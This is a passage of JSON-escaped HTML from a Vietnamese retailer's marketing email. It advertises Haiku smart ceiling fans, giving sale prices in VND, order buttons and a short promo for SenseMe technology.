none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_15\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_16\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>HAIKU WH\\/BL 44\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_17\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">18.5 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">15.8 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_13\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-44inch-mau-trang.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-44inch-mau-trang.html\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768333052-HAIKU-I-S.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_18\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU I SERIES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_19\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>HAIKU WH\\/BL 60\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_20\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">36.9 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup><span style=\\\"line-height: 12px;\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">31.5 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_14\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cao-cap-haiku-i-60inch-mau-den.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cao-cap-haiku-i-60inch-mau-den.html\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:12px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #ef0d33\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #ef0d33;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 20px; line-height: 28px;\\\">KH\\u00d4NG CH\\u1ec8 M\\u00c1T - M\\u00c0 C\\u00d2N H\\u01a0N TH\\u1ebe N\\u1eeeA ?<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ecf0f1; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<br \\/>B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_5\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/bai-viet\\/senseme\\\" style=\\\"height:57px; v-text-anchor:middle; width:279px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/bai-viet\\/senseme\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:20px 30px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM C\\u00d4NG NGH\\u00ca SENSEME<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: 